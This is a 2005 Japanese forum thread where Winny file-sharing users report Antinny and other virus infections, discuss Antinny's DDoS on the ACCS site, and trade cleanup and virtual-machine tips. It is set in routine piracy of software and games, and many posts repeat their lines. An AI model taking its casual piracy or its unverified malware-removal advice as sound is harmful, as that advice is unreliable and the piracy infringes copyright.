628 :[名無し]さん(bin+cue).rar:05/01/20 10:54:30 ID:46zEb+yY0
629 :[名無し]さん(bin+cue).rar:05/01/20 11:03:08 ID:pJzeUZby0
落とした物全てスキャンしてなかったんかい!(ry
630 :[名無し]さん(bin+cue).rar:05/01/20 11:31:19 ID:M9egXrs90
スキャンもスキンも忘れずに
忘れると感染するのはC型とかいろいろあるしな
忘れると感染するのはC型とかいろいろあるしな
631 :[名無し]さん(bin+cue).rar:05/01/20 12:35:31 ID:VlPSpvYe0
今週の日経コンピュータにACCSのWebサイトが
AntinnyのDDOS攻撃で、1年近くダウンしている、という話がでているぞ。
攻撃日になると700Mビット/秒に通信量がはねあがり、
ルーターやサーバーがもたないそうだ。
ACCSはどうでもいいが、威力業務妨害とかで捜査されたくなかったら、
ウィルスだけは感染しないよう気を付けよう。
AntinnyのDDOS攻撃で、1年近くダウンしている、という話がでているぞ。
攻撃日になると700Mビット/秒に通信量がはねあがり、
ルーターやサーバーがもたないそうだ。
ACCSはどうでもいいが、威力業務妨害とかで捜査されたくなかったら、
ウィルスだけは感染しないよう気を付けよう。
632 :[名無し]さん(bin+cue).rar:05/01/20 12:37:04 ID:BGHPLR5k0
【使用OS】XP
【WindowsUpdateしてるか】してない
【AntiVirusは】ノートン
【ちゃんとUpdateしてるか】してない
【スキャンした結果】検出されず
【オンラインスキャンしたならその結果は】まだしてない
【Winnyのバージョン】2.0 b7.1
【Winny歴、総DL量は】1ヶ月くらい
【テンプレを読んだか】読んだ
【テンプレにある対策を実行したか】対策無し
【症状か具体的に、分かる限りすべて書く】キンタマと同じで、その後キーボードからの
操作を受け付けなくなり、CDを読み込まなくなった
【何をしたらそんなことになったのか】うっかりとEXEファイル起動
【これまでにとった措置】特になし
何故かOS再インスコすらできない、誰かボスケテ
【WindowsUpdateしてるか】してない
【AntiVirusは】ノートン
【ちゃんとUpdateしてるか】してない
【スキャンした結果】検出されず
【オンラインスキャンしたならその結果は】まだしてない
【Winnyのバージョン】2.0 b7.1
【Winny歴、総DL量は】1ヶ月くらい
【テンプレを読んだか】読んだ
【テンプレにある対策を実行したか】対策無し
【症状か具体的に、分かる限りすべて書く】キンタマと同じで、その後キーボードからの
操作を受け付けなくなり、CDを読み込まなくなった
【何をしたらそんなことになったのか】うっかりとEXEファイル起動
【これまでにとった措置】特になし
何故かOS再インスコすらできない、誰かボスケテ
633 :[名無し]さん(bin+cue).rar:05/01/20 12:50:50 ID:LLY71+jE0
「Webカメラでユーザーのぞき見」のトロイの木馬作者、スペインで逮捕
ttp://www.itmedia.co.jp/enterprise/articles/0501/20/news025.html
ttp://www.itmedia.co.jp/enterprise/articles/0501/20/news025.html
634 :[名無し]さん(bin+cue).rar:05/01/20 13:37:00 ID:WSp1nvJs0
>>631
攻撃食らわしてるかどうか判定する方法ある?
攻撃食らわしてるかどうか判定する方法ある?
635 :[名無し]さん(bin+cue).rar:05/01/20 14:18:40 ID:geeCZTva0
> 攻撃日になると700Mビット/秒に通信量がはねあがり、
(゚∀゚)アヒャヒャヒャヒャヒャヒャヒャヒャヒャヒャヒャヒャ
ってすげーなおいw
>>632
このスレで言うOS再インスコってのは、クリーンインストールのことなんですが
そこのところはOK?
今のOSがどんなにいかれてても、ハードウェアが生きてる限りできないはずないと思うけど。
(゚∀゚)アヒャヒャヒャヒャヒャヒャヒャヒャヒャヒャヒャヒャ
ってすげーなおいw
>>632
このスレで言うOS再インスコってのは、クリーンインストールのことなんですが
そこのところはOK?
今のOSがどんなにいかれてても、ハードウェアが生きてる限りできないはずないと思うけど。
636 :[名無し]さん(bin+cue).rar:05/01/20 14:43:50 ID:bi6N60M20
637 :[名無し]さん(bin+cue).rar:05/01/20 16:37:08 ID:HvJRPUsK0
ニュイルス攻撃は「尻ませんでした」は通じないからな。まじで。
638 :[名無し]さん(bin+cue).rar:05/01/20 18:00:08 ID:GH9ml2OP0
>>631
気付かなかったw 活動してんのかね、奴ら
気付かなかったw 活動してんのかね、奴ら
639 :[名無し]さん(bin+cue).rar:05/01/20 18:38:07 ID:vBb0c2wh0
うわあーーーーーーーーーーーーーっ!
640 :[名無し]さん(bin+cue).rar:05/01/20 21:56:10 ID:FaFtEKox0
【使用OS】 win98SE
【WindowsUpdateしてるか】 はい
【AntiVirusは】ノートン
【ちゃんとUpdateしてるか】 はい
【スキャンした結果】 検出されず
【オンラインスキャンしたならその結果は】していない
【Winnyのバージョン】 2.0 b7.1
【Winny歴、総DL量は】 一年ほど
【テンプレを読んだか】 はい
【テンプレにある対策を実行したか】 いいえ
【症状か具体的に、分かる限りすべて書く】
60GBある保持キャッシュが8GBと表示されるようになり、
単語検索するとほとんどのキャッシュが見れません。
2.0 b7.1を再度入れても症状は変わりません。
試しに1.14で見ると、正常に表示されていたので安心しました。
2.0 b7.1でキャッシュが見れなくなったのはなぜでしょうか?
【WindowsUpdateしてるか】 はい
【AntiVirusは】ノートン
【ちゃんとUpdateしてるか】 はい
【スキャンした結果】 検出されず
【オンラインスキャンしたならその結果は】していない
【Winnyのバージョン】 2.0 b7.1
【Winny歴、総DL量は】 一年ほど
【テンプレを読んだか】 はい
【テンプレにある対策を実行したか】 いいえ
【症状か具体的に、分かる限りすべて書く】
60GBある保持キャッシュが8GBと表示されるようになり、
単語検索するとほとんどのキャッシュが見れません。
2.0 b7.1を再度入れても症状は変わりません。
試しに1.14で見ると、正常に表示されていたので安心しました。
2.0 b7.1でキャッシュが見れなくなったのはなぜでしょうか?
ただの時刻設定ミスでした。スレ汚しゴメンナサイゴメンナサイ…。
642 :[名無し]さん(bin+cue).rar:05/01/21 00:50:52 ID:LL5xB5wF0
え、どういうこと?後学の為に聞きたい
時刻設定とかがその症状と関係あるの?
時刻設定とかがその症状と関係あるの?
643 :[名無し]さん(bin+cue).rar:05/01/21 01:06:51 ID:NJtKLZas0
未来のファイルは認識しないとか?
644 :[名無し]さん(bin+cue).rar:05/01/21 01:08:06 ID:Wy3cW17e0
>>642
時計を1ヶ月ぐらい巻き戻してny起動してみろ
時計を1ヶ月ぐらい巻き戻してny起動してみろ
645 :[名無し]さん(bin+cue).rar:05/01/21 01:17:01 ID:3/KaczhE0
>>640
You suck!!(゚ロ゚)/ You suck!!(゚ロ゚)/
You suck!!(゚ロ゚)/ You suck!!(゚ロ゚)/
646 :[名無し]さん(bin+cue).rar:05/01/21 04:22:33 ID:fv5g/Dpn0
>>640
バカキタ━━━( ゚∀゚ )━(∀゚ )━(゚ )━( )━( ゚)━( ゚∀)━( ゚∀゚ )━━━!!!!
バカキタ━━━( ゚∀゚ )━(∀゚ )━(゚ )━( )━( ゚)━( ゚∀)━( ゚∀゚ )━━━!!!!
647 :[名無し]さん(bin+cue).rar:05/01/21 10:29:32 ID:S1cHuNVZ0
648 :[名無し]さん(bin+cue).rar:05/01/21 10:37:26 ID:Le379Uc50
649 :[名無し]さん(bin+cue).rar:05/01/21 12:05:23 ID:a9q1UZMi0
Autorun+batって
感染した
エロげーインストールしたあとは、スキャンに引っかかるんでしょうか?
感染した
エロげーインストールしたあとは、スキャンに引っかかるんでしょうか?
650 :[名無し]さん(bin+cue).rar:05/01/21 12:26:06 ID:g8unZu0S0
CD角命8って大丈夫?
Autorunを切ってマウントして
ウイルススキャンすればいいの?
Autorunを切ってマウントして
ウイルススキャンすればいいの?
651 :[名無し]さん(bin+cue).rar:05/01/21 12:46:56 ID:ZAUI0O8Q0
先ず、ここは初心者の質問・救済スレではありません。(これ大事)
652 :[名無し]さん(bin+cue).rar:05/01/21 12:48:48 ID:+WE0c8X10
リロードしてよかった
危うくケコーンすとこだったw
危うくケコーンすとこだったw
653 :[名無し]さん(bin+cue).rar:05/01/21 13:17:54 ID:xMM8pA5y0
アプリATOK17は
hd消去される
気を付けろ
hd消去される
気を付けろ
654 :[名無し]さん(bin+cue).rar:05/01/21 14:05:07 ID:XykpQpfG0
普通に使えるヤツあるじゃん
655 :[名無し]さん(bin+cue).rar:05/01/21 14:57:04 ID:uVMKQ84g0
656 :[名無し]さん(bin+cue).rar:05/01/21 15:03:56 ID:1QcXDmYd0
( ´_ゝ`)
657 :[名無し]さん(bin+cue).rar:05/01/21 15:11:52 ID:gijul6q/0
いまどきWhiterに犯されてるようなら、nyやめたほうがいいよ。
個人情報やデスクトップ流出で信用を失う前に。
個人情報やデスクトップ流出で信用を失う前に。
658 :[名無し]さん(bin+cue).rar:05/01/21 16:29:26 ID:i+LWgPoi0
突然画面が赤く染まりだして女の悲鳴が出てきてOSを破壊し起動できなくする
ウイルスがあるそうなんですが、何なんでしょうか?
新種なのでしょうか?
ここ2〜3日のうちにクラス内の人が数人感染してOSを再インストールするはめになったようです。
特に怪しいファイルやHPを開いたわけでもなく、いきなりだったとか。
共通しているのは、皆winnyのユーザーだったという事だけのようです。
ウイルスがあるそうなんですが、何なんでしょうか?
新種なのでしょうか?
ここ2〜3日のうちにクラス内の人が数人感染してOSを再インストールするはめになったようです。
特に怪しいファイルやHPを開いたわけでもなく、いきなりだったとか。
共通しているのは、皆winnyのユーザーだったという事だけのようです。
659 :[名無し]さん(bin+cue).rar:05/01/21 16:46:05 ID:DSiUN55T0
「Antinny」によるDDoS攻撃に苦しむACCSのサイト、URL変更の暫定措置
http://internet.watch.impress.co.jp/cda/news/2005/01/21/6151.html
感染しっぱなしの奴がそんなにいるのか
http://internet.watch.impress.co.jp/cda/news/2005/01/21/6151.html
感染しっぱなしの奴がそんなにいるのか
660 :[名無し]さん(bin+cue).rar:05/01/21 16:51:33 ID:waa6rqrp0
>658
ウィルスの感染拡大を防ぐために学級閉鎖しろ
ウィルスの感染拡大を防ぐために学級閉鎖しろ
661 :[名無し]さん(bin+cue).rar:05/01/21 16:59:36 ID:ZAUI0O8Q0
ウイルスが勝手にやったことだからーで通用すると思ってるやしがたくさんいるんだろう。
生卵をぶつけたら傷害罪、外れても傷害未遂、教唆まであるのを知らないのと同様に。
生卵をぶつけたら傷害罪、外れても傷害未遂、教唆まであるのを知らないのと同様に。
662 :[名無し]さん(bin+cue).rar:05/01/21 17:01:48 ID:b75oehyY0
>>659
ACCS敗北宣言だな。
リンク先に次のようなことが書いてあるわけだが。
>攻撃を行なっているPCの所有者に対してプロバイダーから対応を勧告し、
>応じないユーザーに対しては解約するといった措置が取れるかどうかを
>検討していきたいとした。
心当たりのあるやつはもう一度確認しといたほうがいいぞ。
ACCS敗北宣言だな。
リンク先に次のようなことが書いてあるわけだが。
>攻撃を行なっているPCの所有者に対してプロバイダーから対応を勧告し、
>応じないユーザーに対しては解約するといった措置が取れるかどうかを
>検討していきたいとした。
心当たりのあるやつはもう一度確認しといたほうがいいぞ。
663 :[名無し]さん(bin+cue).rar:05/01/21 17:49:16 ID:XrnCWPpC0
【使用OS】 WindowsXP Home
【WindowsUpdateしてるか】 sp1の最後までしかしてない
【AntiVirusは】 Norton AntiVirus2002
【ちゃんとUpdateしてるか】 1週間くらい前に切れている
【スキャンした結果】 下記参照
【オンラインスキャンしたならその結果は】 とりあえずまだしていない
【Winnyのバージョン】 Winny2p_b725_001
【Winny歴、総DL量は】 1年以上 数えていない
【テンプレを読んだか】 読んだ
【テンプレにある対策を実行したか】 Antinny対策サイトの項目全部
【症状か具体的に、分かる限りすべて書く】 下記参照
【何をしたらそんなことになったのか】 下記参照
【これまでにとった措置】
今朝、数十個のlzhファイルに能登ん先生かけて、
検疫したあとに全ファイル掴んでラサにつっこんで解凍したら
検出されたんだけどこれって既出?
同時に存在したzipとかはそんな事無かったんだけど・・・
それで感染したと思って対策してたら
何も出てこない・・・
UpフォルダもおかしなキーもNy.exeもぬるぽも無いし
キャッシュも消えないHDDも消えない
セーフモードで立ち上げてスタートアップみたけど何も入ってない
気味が悪いので聞いてみたんだけどどうなんでしょ?
【WindowsUpdateしてるか】 sp1の最後までしかしてない
【AntiVirusは】 Norton AntiVirus2002
【ちゃんとUpdateしてるか】 1週間くらい前に切れている
【スキャンした結果】 下記参照
【オンラインスキャンしたならその結果は】 とりあえずまだしていない
【Winnyのバージョン】 Winny2p_b725_001
【Winny歴、総DL量は】 1年以上 数えていない
【テンプレを読んだか】 読んだ
【テンプレにある対策を実行したか】 Antinny対策サイトの項目全部
【症状か具体的に、分かる限りすべて書く】 下記参照
【何をしたらそんなことになったのか】 下記参照
【これまでにとった措置】
今朝、数十個のlzhファイルに能登ん先生かけて、
検疫したあとに全ファイル掴んでラサにつっこんで解凍したら
検出されたんだけどこれって既出?
同時に存在したzipとかはそんな事無かったんだけど・・・
それで感染したと思って対策してたら
何も出てこない・・・
UpフォルダもおかしなキーもNy.exeもぬるぽも無いし
キャッシュも消えないHDDも消えない
セーフモードで立ち上げてスタートアップみたけど何も入ってない
気味が悪いので聞いてみたんだけどどうなんでしょ?
664 :[名無し]さん(bin+cue).rar:05/01/21 18:24:44 ID:qozPi8ji0
検出されたウィルスの名前は?
665 :[名無し]さん(bin+cue).rar:05/01/21 18:25:49 ID:IxQt36Wd0
666 :[名無し]さん(bin+cue).rar:05/01/21 18:28:47 ID:ZAUI0O8Q0
別に深い意味は無いが。
単に2ちゃんで知らずに「卵ぶつけにいこうぜ」っていうやつが多いからついでに言ってみただけ。
単に2ちゃんで知らずに「卵ぶつけにいこうぜ」っていうやつが多いからついでに言ってみただけ。
667 :[名無し]さん(bin+cue).rar:05/01/21 18:34:20 ID:ttYf9gch0
故意じゃなくとも未必の故意っていうのもある
ウィルス感染有無を気にしないってのはそういう範疇じゃないか?
ウィルス感染有無を気にしないってのはそういう範疇じゃないか?
668 :[名無し]さん(bin+cue).rar:05/01/21 19:32:37 ID:3/KaczhE0
こうアプリに危険が一杯だとつい正規品を買ってしまうな
669 :[名無し]さん(bin+cue).rar:05/01/21 19:37:27 ID:XrnCWPpC0
>>664
ウチに聞いてくれてるんでしょうか
でしたらW32.HLLW.Antinnyです
トレンドの亜種も全部見て回ったんですけど
どうも・・・
何だかシステム全体が極微妙にもっさりしてる気がするんですけど
ウイルスにかかったという心配からなのかどうなのか・・・・
ウチに聞いてくれてるんでしょうか
でしたらW32.HLLW.Antinnyです
トレンドの亜種も全部見て回ったんですけど
どうも・・・
何だかシステム全体が極微妙にもっさりしてる気がするんですけど
ウイルスにかかったという心配からなのかどうなのか・・・・
670 :[名無し]さん(bin+cue).rar:05/01/21 19:45:50 ID:kGfV0emE0
検出したってことはノートンが駆除したってことじゃないんですか?
671 :[名無し]さん(bin+cue).rar:05/01/21 20:10:34 ID:Op9/UYg30
>>669
ノートンでは何ていうか知らんけど、バスターでいう「圧縮レベル」の設定が低かったんではないか?
ノートンでは何ていうか知らんけど、バスターでいう「圧縮レベル」の設定が低かったんではないか?
672 :[名無し]さん(bin+cue).rar:05/01/21 20:14:22 ID:R1x/YE360
>>666
いねーよそんなこと言うヤツ、お前だけだろw
いねーよそんなこと言うヤツ、お前だけだろw
673 :[名無し]さん(bin+cue).rar:05/01/21 20:45:05 ID:CGhc4RXI0
>>669
ラサに突っ込む時点で間違ってる
ラサに突っ込む時点で間違ってる
674 :[名無し]さん(bin+cue).rar:05/01/21 21:03:25 ID:XrnCWPpC0
>>670
むう、そうなんですかね・・・・そうだと1番いいんですけど^;
普通は最初に全部スキャンかけてそこで検疫ができれば今回のような事は
無いハズなので異様に思ったんですよね
>>671
Bloodhoundの設定がそれに当たるんでしょうか
一応推奨の標準でした
何にせよ実害が無いように思えるし
ただウチがスキャンミスっただけかもしれないので
これ以上グだるのも何ですから引きますけど
やってみたい人いますか?
っと書いてる間にレスが
>>673
ラサと書いたんですが正式には+Lhacaです一応。
個人的にはrarはらるちであとのzipとlzhはまとめて+Lhacaに^;
他のにしたほうがいいんですかね・・・
むう、そうなんですかね・・・・そうだと1番いいんですけど^;
普通は最初に全部スキャンかけてそこで検疫ができれば今回のような事は
無いハズなので異様に思ったんですよね
>>671
Bloodhoundの設定がそれに当たるんでしょうか
一応推奨の標準でした
何にせよ実害が無いように思えるし
ただウチがスキャンミスっただけかもしれないので
これ以上グだるのも何ですから引きますけど
やってみたい人いますか?
っと書いてる間にレスが
>>673
ラサと書いたんですが正式には+Lhacaです一応。
個人的にはrarはらるちであとのzipとlzhはまとめて+Lhacaに^;
他のにしたほうがいいんですかね・・・
675 :[名無し]さん(bin+cue).rar:05/01/21 21:26:10 ID:lygQckSv0
676 :[名無し]さん(bin+cue).rar:05/01/21 21:45:53 ID:JzzxOwxR0
140件程度ならすぐに連絡が取れそうなのに、まだ動かないんだな。
677 :[名無し]さん(bin+cue).rar:05/01/21 22:41:16 ID:ttYf9gch0
ACCSは実は全然困ってなくて、単に宣伝材料に活用したいだけちゃうんか
と勘ぐってまう
と勘ぐってまう
678 :[名無し]さん(bin+cue).rar:05/01/21 23:01:45 ID:JzzxOwxR0
んだよなあ。
プロバイダまで迷惑を受けてるんだからさっさと連絡すればいいじゃん。
プロバイダまで迷惑を受けてるんだからさっさと連絡すればいいじゃん。
679 :[名無し]さん(bin+cue).rar:05/01/21 23:12:26 ID:R6uCw3DG0
駆除と感染の違いも分からない奴多すぎ?
680 :[名無し]さん(bin+cue).rar:05/01/21 23:24:20 ID:WsUgB2p+0
VMWAREやVatualPCで仮想マシン上からnyしたら
ウイルスかかっても仮想マシンごと削除することで大丈夫?
ウイルスかかっても仮想マシンごと削除することで大丈夫?
681 :[名無し]さん(bin+cue).rar:05/01/21 23:45:11 ID:pNbQrgH60
確証はでき無いがまず大丈夫
でも仮想PC上でnyを思う存分動かすだけのスペックのPC一台買うくらいなら、
その差分のお金でny専用PC買った方が安く付くかも知れない
メモリとCPUを潤沢に積まないとny動かすだけでも結構大変だよ?
でも仮想PC上でnyを思う存分動かすだけのスペックのPC一台買うくらいなら、
その差分のお金でny専用PC買った方が安く付くかも知れない
メモリとCPUを潤沢に積まないとny動かすだけでも結構大変だよ?
682 :[名無し]さん(bin+cue).rar:05/01/21 23:49:17 ID:pNbQrgH60
なんか大分日本語が変になってきたので寝る
仮想PCはアヤシイexeとかCDイメージとかを試すのにだけ使えば十分だと俺は思う
仮想PCはアヤシイexeとかCDイメージとかを試すのにだけ使えば十分だと俺は思う
683 :[名無し]さん(bin+cue).rar:05/01/21 23:49:31 ID:8XbPxwrq0
CacheやDownフォルダを全部仮想マシン側のイメージドライブで
管理してるならともかく、リアルなドライブを仮想マシンにマウン
トしてたらアウト。仮想マシンは胡散臭いファイルの実行テストに
最適なUndosable環境だと認識すべし。
管理してるならともかく、リアルなドライブを仮想マシンにマウン
トしてたらアウト。仮想マシンは胡散臭いファイルの実行テストに
最適なUndosable環境だと認識すべし。
684 :ひみつの文字列さん:2024/12/18(水) 20:55:08 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
685 :[名無し]さん(bin+cue).rar:05/01/22 00:36:44 ID:Se07JHE/0
>>684
嘘をつくではない
嘘をつくではない
686 :[名無し]さん(bin+cue).rar:05/01/22 00:42:03 ID:ryDvMBzi0
とりあえず事実なんだが・・・
ウィルスの仕業と言うより、ノートンのエラーなのか?
エラーで自分感染させるというのも困りものだが・・・
ウィルスの仕業と言うより、ノートンのエラーなのか?
エラーで自分感染させるというのも困りものだが・・・
687 :[名無し]さん(bin+cue).rar:05/01/22 00:53:15 ID:XqPD+0Vt0
スタートアップに解凍されて、再起動したときに感染。じゃないの?
よーしらんが。
よーしらんが。
689 :[名無し]さん(bin+cue).rar:05/01/22 01:43:42 ID:huk2LCDF0
>>684
解凍ソフトは?
解凍ソフトは?
690 :[名無し]さん(bin+cue).rar:05/01/22 02:04:20 ID:i3gkjxmN0
>>684
報告なら確認できる事実だけ述べないと混乱する
〜ぽいとか何よ、ふざけてんの?
"(ryは W32.Pinfi ウィルスに感染しています。 "
というのはウィルスを含むと思われるファイルがそこにあるというだけで、
解凍しただけで"感染した"ということにはならないでしょ
報告なら確認できる事実だけ述べないと混乱する
〜ぽいとか何よ、ふざけてんの?
"(ryは W32.Pinfi ウィルスに感染しています。 "
というのはウィルスを含むと思われるファイルがそこにあるというだけで、
解凍しただけで"感染した"ということにはならないでしょ
691 :[名無し]さん(bin+cue).rar:05/01/22 02:17:29 ID:n3kdul+h0
692 :[名無し]さん(bin+cue).rar:05/01/22 02:41:08 ID:i3gkjxmN0
>>691
>正常なファイルとして存在していたものに、ウイルスが書き加えられた場合は感染という
ウイルスの動作の結果、正常なファイルが改変されたら、それは感染している状態
一方で、感染済のファイルをアーカイブから解凍しただけであれば、未感染
ノートンが検疫のために作成した一時ファイルにウィルスコードが含まれている状態も未感染
>正常なファイルとして存在していたものに、ウイルスが書き加えられた場合は感染という
ウイルスの動作の結果、正常なファイルが改変されたら、それは感染している状態
一方で、感染済のファイルをアーカイブから解凍しただけであれば、未感染
ノートンが検疫のために作成した一時ファイルにウィルスコードが含まれている状態も未感染
693 :[名無し]さん(bin+cue).rar:05/01/22 02:45:18 ID:lC9IQKOw0
×P標準なんぞ使ってる時点で(ry
694 :[名無し]さん(bin+cue).rar:05/01/22 04:01:37 ID:tLMuugPM0
>>692
横から口を出してスマンが、PCを基準として考えた場合
・PCにウイルスと種別されるファイルが侵入した時点で「感染した」
・PC上でウイルスが起動し、動作を開始した時点で「発病(発症)した」
とも表現できると思われ。
ファイルを基準にして考えたら、書き換えられてウイルスコードが混入した時点で
「感染」ってことになるから、>>692の考え方は確かに正しいんだが。
その辺、基準がお互い食い違ってる場合もありそう。
駄レス済まんかった。
横から口を出してスマンが、PCを基準として考えた場合
・PCにウイルスと種別されるファイルが侵入した時点で「感染した」
・PC上でウイルスが起動し、動作を開始した時点で「発病(発症)した」
とも表現できると思われ。
ファイルを基準にして考えたら、書き換えられてウイルスコードが混入した時点で
「感染」ってことになるから、>>692の考え方は確かに正しいんだが。
その辺、基準がお互い食い違ってる場合もありそう。
駄レス済まんかった。
695 :[名無し]さん(bin+cue).rar:05/01/22 07:00:12 ID:ZSaLh2bb0
さすがにウィルス入りファイルをダウンロード(もしくはコピー)
した時点で「感染」とは呼ばないと思うが...
した時点で「感染」とは呼ばないと思うが...
696 :[名無し]さん(bin+cue).rar:05/01/22 07:01:01 ID:fDiXoXcD0
Norton2003(正規品)とバスターのオンラインスキャンをしてみた
結果
ノートン3個
バスター2個
ノートンは2chのログが反応
バスターは
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DELWIN.D
が検出てかかなりやばいウイルスじゃん、検出しろよ
ちなみに感染ファイルは解凍前の2003年のジャンプ
結果
ノートン3個
バスター2個
ノートンは2chのログが反応
バスターは
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DELWIN.D
が検出てかかなりやばいウイルスじゃん、検出しろよ
ちなみに感染ファイルは解凍前の2003年のジャンプ
697 :[名無し]さん(bin+cue).rar:05/01/22 10:12:39 ID:u6NjVM3G0
ウイルスにキャッシュをすべて消されて(´・ω・`)ショボーンだったが
フリーのファイル復元ソフトで(゚∀゚)ウマー!でした
フリーのファイル復元ソフトで(゚∀゚)ウマー!でした
698 :[名無し]さん(bin+cue).rar:05/01/22 10:30:57 ID:fckR7AJF0
>696
ノーdのオンラインスキャンは書庫の中までは見ないぞ。代わりに2chログを検索してくれる
バスターのは一応書庫内部まで見るが、トレンド自体がやや対応遅いからな
ノーdのオンラインスキャンは書庫の中までは見ないぞ。代わりに2chログを検索してくれる
バスターのは一応書庫内部まで見るが、トレンド自体がやや対応遅いからな
699 :[名無し]さん(bin+cue).rar:05/01/22 11:15:38 ID:fAQjJ8uZ0
【使用OS】 2000
【WindowsUpdateしてるか】 している
【AntiVirusは】 していない
【オンラインスキャンしたならその結果は】 トレンドマイクロのオンラインスキャンをしたら
AntinnyのAが5個、Hが1個、Qが1個検出された
【Winnyのバージョン】 2.0 b7.1
【Winny歴、総DL量は】 約一年、10Gくらい
【テンプレを読んだか】 はい
【テンプレにある対策を実行したか】 ほとんどなんの対策も取っていなかった
【症状か具体的に、分かる限りすべて書く】upフォルダが作成されてdownフォルダ内のファイルをコピー
してupしはじめた。
【何をしたらそんなことになったのか】 解凍したファイルの中にあった.exeを実行してしまいました。
クリックしても画面上に何の変化も無かったので何度も実行してしまいましたorz
【これまでにとった措置】スキャンして感染が分かったらすぐにwinnyフォルダを削除しました。
面倒な事になったと思い一晩放置。翌日、もう一度スキャンしてみるとANTINNY_Aが一個検出されただけだったので
それを削除。その後テンプレサイトにあるように、レジストリをいじったりwin.iniを書き直す。再びスキャンすると
なにも検出されず。
しかし、駆除ツールも使っていないのに、一晩放置しただけでウイルスの数が激減していたので逆に気味が悪いです。
これで安心していいのでしょうか?
【WindowsUpdateしてるか】 している
【AntiVirusは】 していない
【オンラインスキャンしたならその結果は】 トレンドマイクロのオンラインスキャンをしたら
AntinnyのAが5個、Hが1個、Qが1個検出された
【Winnyのバージョン】 2.0 b7.1
【Winny歴、総DL量は】 約一年、10Gくらい
【テンプレを読んだか】 はい
【テンプレにある対策を実行したか】 ほとんどなんの対策も取っていなかった
【症状か具体的に、分かる限りすべて書く】upフォルダが作成されてdownフォルダ内のファイルをコピー
してupしはじめた。
【何をしたらそんなことになったのか】 解凍したファイルの中にあった.exeを実行してしまいました。
クリックしても画面上に何の変化も無かったので何度も実行してしまいましたorz
【これまでにとった措置】スキャンして感染が分かったらすぐにwinnyフォルダを削除しました。
面倒な事になったと思い一晩放置。翌日、もう一度スキャンしてみるとANTINNY_Aが一個検出されただけだったので
それを削除。その後テンプレサイトにあるように、レジストリをいじったりwin.iniを書き直す。再びスキャンすると
なにも検出されず。
しかし、駆除ツールも使っていないのに、一晩放置しただけでウイルスの数が激減していたので逆に気味が悪いです。
これで安心していいのでしょうか?
700 :[名無し]さん(bin+cue).rar:05/01/22 11:39:09 ID:EHiBP0b80
701 :[名無し]さん(bin+cue).rar:05/01/22 11:50:38 ID:fckR7AJF0
>700
常駐させてたって、未対応の新種/亜種には無意味だろ
逆に頼り切ってる方がどうかと
>699
ここはスキャンに反応しない新種/亜種を報告するスレです
再インスコでもしてなさい
常駐させてたって、未対応の新種/亜種には無意味だろ
逆に頼り切ってる方がどうかと
>699
ここはスキャンに反応しない新種/亜種を報告するスレです
再インスコでもしてなさい
702 :[名無し]さん(bin+cue).rar:05/01/22 11:53:32 ID:fDiXoXcD0
今の時代割れしなくてもセキュリティソフトなしではネット出来ないからな
ノートンのログ見たらわかるがいまだにMSBlastの攻撃が大量にくるからな
数分に一回はある(ちなみにepmapのデフォルト遮断ってやつ)
ノートンのログ見たらわかるがいまだにMSBlastの攻撃が大量にくるからな
数分に一回はある(ちなみにepmapのデフォルト遮断ってやつ)
703 :[名無し]さん(bin+cue).rar:05/01/22 11:55:46 ID:EHiBP0b80
704 :[名無し]さん(bin+cue).rar:05/01/22 12:07:10 ID:bZ+qfgoz0
少なくとも6割はふせげると思ってるが、アンチウイルスいれとけば
残りの亜種は仕方ないんじゃね?イチゴ菌とかでも明らかに挙動変わるし
気付いた奴多いだろ。変なEXEを実行するDQNは例外
705 :[名無し]さん(bin+cue).rar:05/01/22 12:50:38 ID:5O5pEuGQ0
もう質問テンプレは載っけない方がいいんじゃないのか。
初心者を洗い出して追い出すために作ったんだろうが、
逆に初心者が気楽に質問する口実を与えているような気がする。
初心者を洗い出して追い出すために作ったんだろうが、
逆に初心者が気楽に質問する口実を与えているような気がする。
706 :[名無し]さん(bin+cue).rar:05/01/22 13:26:23 ID:ACrZr4nb0
>>681>>683
アドバイスアリガd
実際導入してみました。動作は結構重い感じがします。
確かにここからny繋ぐにはちょっと不向きかも。
でもexeファイル試すくらいならOKですね。
スペック上げたらどれくらい使えるのか試してみたいと思います。
アドバイスアリガd
実際導入してみました。動作は結構重い感じがします。
確かにここからny繋ぐにはちょっと不向きかも。
でもexeファイル試すくらいならOKですね。
スペック上げたらどれくらい使えるのか試してみたいと思います。
707 :[名無し]さん(bin+cue).rar:05/01/22 13:46:46 ID:ZJr1Wdur0
>>701みたいに曲解して煽ってくる読解力ゼロウイルスを駆除する方法が知りたい
708 :[名無し]さん(bin+cue).rar:05/01/22 13:51:44 ID:huk2LCDF0
テンプレに
【WindowsUpdateしてるか】してない
【AntiVirusは】してない
いずれかがしてない場合
なぜしてなかったか理由を書かせて反省文みたいにしようぜ
【WindowsUpdateしてるか】してない
【AntiVirusは】してない
いずれかがしてない場合
なぜしてなかったか理由を書かせて反省文みたいにしようぜ
709 :[名無し]さん(bin+cue).rar:05/01/22 13:57:55 ID:DjUWwmQ30
テンプレいらん
710 :[名無し]さん(bin+cue).rar:05/01/22 14:06:24 ID:1eY9+bkd0
711 :[名無し]さん(bin+cue).rar:05/01/22 14:27:26 ID:6nzXEWG00
マンドクセ
・・・しか書かないと思われ
・・・しか書かないと思われ
712 :[名無し]さん(bin+cue).rar:05/01/22 15:41:36 ID:2kLh12Kz0
そうじゃなくてテンプレ浸かってる人には創造的なボケで返そうぜ
713 :[名無し]さん(bin+cue).rar:05/01/22 16:02:03 ID:fckR7AJF0
>703
亜種なら、ソースを読み取れば未対応ですら防げるだろ
セキュリティの穴を突いてくる新種に気配りを怠るなって事だ
基礎≠常駐
亜種なら、ソースを読み取れば未対応ですら防げるだろ
セキュリティの穴を突いてくる新種に気配りを怠るなって事だ
基礎≠常駐
714 :[名無し]さん(bin+cue).rar:05/01/22 16:14:10 ID:i3gkjxmN0
>713は具体的にどんなウィルス対策をしてるんだ??
715 :[名無し]さん(bin+cue).rar:05/01/22 16:41:58 ID:7f0Cq97k0
AVGみたいなフリーのものくらい入れておこうよ…
716 :[名無し]さん(bin+cue).rar:05/01/22 18:25:29 ID:OMOASxyT0
717 :[名無し]さん(bin+cue).rar:05/01/22 18:25:47 ID:aGCENc1D0
病気になってから予防注射うつんです
718 :[名無し]さん(bin+cue).rar:05/01/22 18:38:14 ID:2VMucevg0
